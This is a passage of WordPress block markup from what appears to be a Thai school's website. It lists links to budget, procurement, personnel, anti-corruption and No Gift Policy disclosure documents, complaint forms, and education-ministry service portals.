gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 